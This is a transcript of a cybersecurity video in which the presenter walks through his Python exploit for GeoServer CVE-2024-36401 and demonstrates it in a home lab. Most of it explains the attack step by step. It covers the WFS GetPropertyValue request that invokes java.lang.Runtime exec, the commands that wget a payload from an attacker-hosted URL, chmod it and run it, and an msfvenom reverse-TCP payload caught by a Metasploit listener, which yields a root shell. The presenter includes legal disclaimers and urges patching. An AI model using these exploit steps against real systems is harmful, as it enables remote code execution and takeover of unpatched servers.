Hey kids, welcome back to my cybersecurity show. And today we are going to be using a custom Python script that I built to exploit a new vulnerability. I say new, it's newish. It's been around a hot minute, but let's take a look at the hacker news, which brings us this article. GeoServer vulnerability targeted by hackers to deliver backdoors and botnet malware. That is a horrible thing, and I hate to hear that that is happening, but that is the name of this dumpster fire that we call cybersecurity. Let's all just bathe in its lava and ash, shall we? A recently disclosed security flaw in GeoServer GeoTools has been exploited as part of multiple campaigns to deliver crypto miners botnet malware. That's a weird sentence. Botnet malware such as Condi and GenX, and a known backdoor called Sidewalk. We've got ourselves a CVE going on over here, 2024-36401, with a CVSS score of 9.8 on the Richter scale. Ooh, man, that's a big old quake right there. That is not something you want to have happen to you and or your software. But it has been added to the catalog, right? The known exploited vulnerabilities by the CISA, Security Agency of the U.S. government. It did that in mid-July. Very interesting. Now, this is the, 10,000-foot view of what's going on here. But the article that really gives you the meat and potatoes, the things that I needed to create the script, was in a Fortinet blog post that kind of like gives you all the meat and potatoes about this attack, the attackers, the malware they're using, their TTPs on getting it uploaded and running, and their C2 traffic and all that other fun stuff. And I think it probably even talks a little bit about like why this is vulnerable and how this is going on. But ultimately, I only needed one piece of information from this thing. Let's go take a look, shall we? We got this one right here. It does come from Fortinet. FortiGuard Labs Threat Research Group has written up a fine article, and you totally should read this. But it points to everything you need to know, like the affected platforms. We've got versions 223.6, 224.4. You can't see it behind this stupid green bar. I don't know why they put that there. And I haven't seen an easy way to make that go away. But I think it's 225.2. We'll see. Don't worry. I'll verify that momentarily. Impacted users, of course, is any organization. The remote attackers gain control of the vulnerable systems, and the security level is critical. This is open source software written in Java, and that's part of the issue, right? Shares and edits geospatial data. It is the reference implementation of the Open Geospatial Consortium, the Web Feature Service, and the Web Coverage Service standards. Bada bing. Now, we've seen a lot of this already. Yeah, there it is right there. The shortcoming has been addressed by versions 223.6, 224, something. Is that stupid green bars in the way? And 225.2. I could do this, I guess. There you go. 224.4 and 225.2. And it looks like it was, like I said, mid-July and so on and so forth. Like I said, there's one piece of information in here. This is all good. You should totally be reading this. But ultimately, this is the piece of information that I needed to be able to build my script. This is the request that you need to make via HTTP against the server to get execution. Now, you can see in here, there's a lot of stuff going on as far as the attack is. This is what they were seeing in the wild. This is actual cyber threat intelligence right here to see what is going on. You can see it's grabbing this remote.sh shell. I don't know if you can see it really well, but it's grabbing this remote.sh shell using curl, which is overscrolled. There's the IP, and it is dropping it at remote.sh, or that's the output file, -o remote.sh. Here's the URL that grabs remote.sh. Then it runs a chmod, gives it the executable permissions, and then executes remote.sh. That was the kind of stuff that I needed. Now, they pulled it into one. I kind of teased it out a little bit just to make it kind of easier for us to look and see and for me to deal with when I'm building my script, because it was, as you can see, it's a bit of a jumbled mess. And it's kind of hard to work with. So I tried to make it a little bit easier for all of us to work with. With that said, that was the only real piece of information that I needed to create my script. Totally read all the other stuff in the Fortinet article, especially if you are using the GeoServer software, right? And go by the way, go update. I'll wait. We'll sit here. Don't worry. And you're back. Good to have you. I know that probably just took you a few minutes, but hopefully it did anyway. You didn't have any problems. Everything went smooth, but now you're a little more secure. Speaking of warnings, warning, do not use anything you see or learn in any of my episodes, including this one, anything on my channel, anything you ever see from me, for lawlessness, to break the law, to be nefarious, to be a bad person. Don't be a jerk, as we like to say, because that's not cool. What I do encourage you to do is learn and to practice and to pick up new skills and to get your hands dirty on stuff like that on systems that you actually own. And I'm going to show you how to do that here in just a moment. Or if someone has given you permission to hack on their stuff, totally cool as well. We don't do the other stuff. I do not condone those types of things, right? Only stuff you own or have permission to. All right, with that out of the way, let's get to it. Now, first thing we need to do, I did bring up the NVIDIA, the CVE. You can take a look at that on your own. It does have some good information in here about, especially with mitigations and things like that. Ultimately, you know, we've got that 9.8 critical. We've got that attack vector of network. We've got the attack complexity of low, and the permissions required is none. User interaction is none. Scope is unchanged. Confidentiality high. Integrity high. Availability high. That means this is, like I said, a giant dumpster fire. So please, yes, definitely go read the CVE, and I'll make sure to try to put all these links in the description below for you good folks out there. So the next thing we need is the server software. There it is. So I went to GeoServer .org / actually went to downloads. I think I'm a little ahead of myself. Yeah, there it is right here. I'm at /download. So geoserver.org /download. And of course, they want you to go straight for the most latest and greatest version of this thing right out of the gate. Because even if there wasn't a security flaw, they're probably doing like constant updates to the UI and things of that nature, tweaks to make it better. So you do want the latest if you haven't installed and you don't have any good reason not to go that way. But I need to go to archive because that's where this is, and that's where that sent me here. And then from here, what I did was I looked for the right version. So there's GeoServer 2.2.5. So we know 2.2.5.3 and 2.25.2 are not susceptible to this vulnerability. They're not weak. But 2.25.1 is. You click on that monkey, and that takes you here. And what you want to do is, now you can go through creating a virtual machine, throw it on a Windows system, grab that platform independent binary, get crazy if you like, right? But what I did was I downloaded the documentation guide because I wanted to take a look at how to install it before I got too deep in the weeds to make sure it wasn't going to be like crazy amounts of time and effort before I got into this. And then once I got that took me here once I fired it up. And it's telling me, okay, I'm going to require Java 11 or 17 JRE. It's like, oh my goodness. And then right around here, I see I can use the Linux binary, the Windows binary, the Windows installer, the web archive, or the Docker container. And I thought, hallelujah, it's got a Docker container. That's going to make life so much easier because then I ain't got to do jack. I just got to pull the Docker container, fire up the Docker container, and so on. So if you click that link, it'll take you here. And now we got this quick start area right here. And I've already kind of scrolled to that part. It's right below as you get it fired up. Now I just got to follow the bouncing ball, right? Copy pasta stuff. Download the container. So right click, copy, no problem. Grab I'm going to put it, let's put it here. I'm going to grab that. I'm going to paste that in. I'm going to Control A, go back to the beginning. Don't forget to sudo that and fire it off. Type in your password. What's it? Always forget my password. I think that was right. Yeah, cool. Now I've already got it pulled down, so that's why it's saying, hey, you're already up to date. But if you weren't, you'd be good to go at this point. Okay. Now the next thing I need to do is go back here and run the Docker container. Bada bing, highlights, copy, run back here, sudo that this time without forgetting. And just be aware it is running on port 8080. So if you were wanting to use like Burp Suite or anything else that's running on port 8080, you're going to find yourself in a conflict. So just make sure your test environment isn't already using 8080. I think that's kind of a baked in thing. It's expecting port 8080 for it to run, so just be aware. I'm going to hit that. It is cooking. While it's cooking, let's jump in and take a look at the script that I created and walk through the code and see what that is all about, shall we? So I am going to, let's see here. No, I'm not going to cat. Let's just nano. I just called it geopone.py. Now, right here at the very beginning, we got some imports we got to do, right? Because that's the way Python works. You want it to do stuff, you got to pull from that old standard library. Requests for doing HTTP, GET, POST, whatever you like to do HTTP requests. I'm grabbing sys so that I can do this sys.argv thing. And we're going to take a look at all this argument stuff, and that's just basically pulling from the CLI, the terminal. When I fire off, it's going to be a positional argument, a parameter, and that's going to be useful to us, and we're going to see that right down here in just a second. I'm grabbing the OS because we are going to be using MSF Venom to create a payload, and I need to be able to tell the machine, hey, tell MSF Venom to do something and make it happen. I don't have to do it manually. I want as much automagic as I can make, at least in a very short amount of time. And then I grabbed time because I wanted to sleep a couple times. I'm not sure if I actually need it, to be honest with you, but I did it anyway. It doesn't hurt anything. Just wanted to make sure that, like, when I'm generating the MSF Venom payload, that it waits enough amount of time that the payload is actually there. When I actually try to upload the payload to the target server, that it has enough time to do so before it moves on to the next thing. So I just had some time. It's like 2 or 3 seconds. I think one's 3 seconds, the other's like 1 second, right? So now that we have that, we've got this if block that says if len or length of sys.argv does not equal 5, so there should be 5 arguments on the end there. If it's not, then throw this usage, right? geopone.py, tell me what the domain is, or IP, maybe I should put IP there. Tell me the payload URL, tell me the L hosts for your C2 server, and the L port for your C2 server, and then exit. Bing. So if it doesn't meet the criteria, just exits out, prints that to the screen, and it says, please try again. This should be fun. And then let's see here. What else are we looking at? Now I've got a bunch of different variable names that I'm pulling in. I've got domain, I've got evil URL, L host, and L ports. So domain, obviously, right? That's going to be the domain. What is the IP or the domain name? So if this was like example.com, you could put example.com there. But for our intents and purposes, it's going to be an IP address. So maybe I should make some change to this, but you get the idea. And that's going to be pulling from the first parameter position from the command line, which is actually the second, right? Because you got geopone, which is argv0. So our geopone.py is argv0, then the domain is going to be argv1. So it's actually the second position, but because computers count starting with 0, in a lot of ways, it is number 1. In the second position, what do we have here? We've got evil URL. Welcome them to the stage. sys.argv number 2, right? And that's going to be where you get the payload. So once we generate that MSF Venom shell, that payload, we're going to need to host it. That does bring up a good point, right? We're going to need a couple of things. I'm going to be running Metasploit as our C2 server. So it's going to catch our shell and give us the functionality of working with command and control. And I'm also going to need an HTTP server. And that can be Apache, Nginx, whatever you got. You could slap this thing up in AWS, S3, give it an S3 URL, whatever you like. Get crazy. It's fine. And it should work as long as you have internet access if it's in the cloud somewhere. But if it's in a local lab like what we're doing, just give it the IP of the HTTP server that you're running. Okay? Now, from here, we need to also give it the L host and the L ports of the C2 server of where it's listening. So when we run that and it's ready to catch shells, we have that information set here and we can set it there and everything should line up and therefore work. Moving on, I've got this generating MSF payload shell. So here's where I'm using that make shell equals os.system. This is where I'm calling the operating system to do something for me, which is, and I'm using format strings to make this happen because inside of here, you'll see, am I in that line? No, I got to go up there. You'll see that I've got MSF Venom-P, which is the payload, which is going to be Linux x64 interpreter reverse TCP. That is the only payload I'm using at this point in time. So you got to be aware that that's the payload we need to set for our listener. And then, of course, the L host. And right here, you can see I'm using I'm using this variable calling here, and that's why I'm using that format string in this statement. Doing the same thing with L ports. I am shoveling out as the format of ELF because it is Linux that I am attacking, and then I'm outputting it to the file shell. It's just called shell. Fairly simple. Let's move on. We have this is where I pulled that sleep function, right? So I got time.sleep3. So it's just going to sleep 3 seconds. I just wanted to make sure that the shell was done. It was settled. It was there. I'm pretty sure I don't actually need this, but hey, I was erring on the side of caution, as it were. Now I've got this multi-line print statement, also using format strings, because I just wanted to give some information to the user, right? Hey, we're attempting CVE 2024 36401 POC. Here's the domain that you gave me. Here's the evil URL that you gave me. Here's the L host that you told me you set, and here's the L port that you set. Okay? Now this is where it gets fun. This is the actual exploitation part of the game, kids. So, using that format string, again, so real quick, I made it a multi-line variable for ease of readability because, like I said before, it was like a hodgepodge of stuff. It was really hard to read. This is going to make it a little bit easier for us to step through, understand what's going on, at least to some extent, and then work with that in our heads. I think, at least for me, a little bit better. So here we have that format string because I'm using that domain variable name here. And it's on port 8080, GeoServer, top WFS. And then we've got the query string of service equals WFS. And then we've got the version of 2.0, request equals get property value, type names equals top. And you do see, like right here, we've got this %3a, it's just a URL encoded character. I found that some of the characters were fine, like a slash and a dot, and some other characters it didn't like spaces. So some of the characters I had to URL encode so that they would pass correctly and not give me an error. What are you going to do? Web apps, right? Finicky little creatures. So that's what's going on there. Then we got this ampersand value reference equals exec. And now we're really cooking with fire right here, right? So we've got exec, and we call this function of java.lang.runtime.getRuntime. And then you got a %2c at the end, which is just, again, a URL encoded character. That is what is going to execute our actual commands that we want it to run, which you can see here. It starts with this single quote, grabbing all this right here to the end of the single quote, wrapped in a lovely between this exec parentheses. And what are we doing? We're running a wget. And that %20, that's just a space. And then it's given the HTTP of the evil URL and /shell. So I'm just building that request endpoint, that URL, that URI, for that actual piece of payload that we need. And then down here, I just do requests.get, and I throw it the get shell. So this is just a variable. I throw this in request.get, and request.get actually runs that and makes the HTTP request. That's why we needed the requests imported in at the top of our script. Then I did a time.sleep1 just to give it just a little bit of time, very small amount of time, not a large amount of time, but a very small amount of time, so that it could download fully our 1 meg shell file. Just, again, paranoia. 1 second isn't going to kill me, right? So I took it. Now we got this other variable, right? And this one's called SetExec, and this is where I'm going to set the executable bits. Kind of saw that back in our original piece of code that we saw in the Fortinet article, right? And then right here we're running chmod %20 is a space. A %2b is a plus symbol. So I'm doing that with an X. So plus X. So chmod plus X. Hopefully that's making sense to anybody that's ever used Linux before. Setting the executable bit on this file. Again, doing a %20. Kind of got jumped out of there. My bad. There it is, %20. And then ./shell. So hopefully that file has been downloaded. That payload has been downloaded to our target. Now I'm setting the executable bit on that file, that binary. I got one more stop. Well, first I gotta run this, right? So request.get setexec. And now I've got run shell. Again, a bunch of the same stuff. It's that last line. That's the kicker, right? Which is ./shell, which means, hey, run this executable if it is executable. If that all works, and of course I have to do request.get.run shell, then it should just kind of print out to the screen, hey, check for a new session in a Metasploit. If this all works, kids, we are going to have ourselves a good time. So that all said, let's make it happen. Now, we do need to do a couple things, right? We got to get Metasploit running. We got to set the listener. We got to make sure the right payload is set on the listener, and we need an HTTP server. I'm just going to use Python because it's expedient and easy. I'm not running Apache or anything on this system, so just for the sake of ease and speed, I'm going to use Python. But whatever your pleasure is, get crazy. Should we go ahead and do this? I think we should. I really feel like it. Let's get in there. Let's see here. I got another terminal open up here, and here let's just run our code. Python 3, and it is geo.pwn.py. As you can see, it pisses and moans about me not doing it right. Hey, do it like this. Cool. Well, let's do it like that, shall we? I'll just press up. And our domain is going to be 172.17.0.2. That should be what's up. So 172.17.0.2. I always want to put 16 because that's what I always think, but Docker threw it on as 17. Then I need the payload URL, right? Oh, that's a good question. Let's do that. Let's split this horizontally. I'm going backwards here, ain't I, kids? I am going all the way backwards. What I need to do, did I do this here? Yeah, let's get out of here. Control X. Let's fire up MSF, or the MSF console, right? MSF console, because we need that. Starting the Metasploit framework. Man, I get the cart and the horse confused a lot lately. I'm getting old, kids. I'm getting old. Look at all the gray in the old beard there. I'm old. When I was your age, we didn't have the Metasploits. What else do I need? I'm going to also split this like that. And I'm going to get that Python 3-m http.server cooking as well so that I can serve up the payload. I'm just going to kind of bring that down. And from here, we are going to use exploits /multi/handler. And then, as you can see, it sets the payload by default to generic, but we need that Linux interpreter shell. So we're going to set payload to Linux /x64/interpreter _reverse _TCP. And the only other thing we need to do is set lhost to our host. So .17.0.1 and set well, I guess we can leave the L part. Let's look at the options. Let's see what it is. Probably 4444. I think that's the default. And that's totally fine. Yeah, there it is. 4444 right there. Cool. That is running. So let's go ahead and run that. And once the listener's cooking, we should be good to go because we'll have the HTTP server is running. And now we do have the handler running on port 444. Cool beans. Let's jump back to here. I didn't actually need this. So now we can get back to here. So we've got Python 3, geopwn.py. We've got the domain. That's set in there. Normally this would be like, example.com or whatever, but again, it's a lab. Our payload URL is going to be 172.17.0.1 on port 8000. Yes. And then our listening host is 172.16.17.0.1, and our port was 4444. It's the moment of truth, kids. If everything goes well, we should be looking at a new interpreter session and shell access to that machine. RCEs all day long. They're good. I highly recommend them if you have the means. So let's see if it works. Fingers crossed. So it's generating the MSF payload. Cool. It's giving me some of that output. It did save as shell, giving me all the output that I was looking for. Now it does say check for a new session. So didn't get any errors. It didn't crap out on me. And let's see. Oh yeah, there it is. Do the dance. Interpreter session 1 is opened for business. Cool beans. I can do shell. And then from there I can do ID. Oh, look, I'm running as root. Host name. It's got a weird host name because it's a Docker container. And, ls dash, AL, that kind of stuff. And I can see there's Apache Tomcat. There's a config directory. There's a GeoServer data directory. There's our shell that we dropped. And there's a startup script. Man, I could start doing all sorts of fun stuff and set this thing up for my personal enjoyment because it's mine and I own it. I would never do this against some unauthorized device, nor should you. That was fun, guys. I really had a good time building all this. It kind of got me back in the old Python mode because I haven't played with Python in a little bit. So that was good. That was good for the soul. It felt good. Hopefully it felt good for you too. Until next time, this has been a lot of fun. I hope to see you. And then if you got something out of this, please like and subscribe. As you know what to do. I'm not going to bother you with that. Have a good one, everyone. And until next time, keep hacking.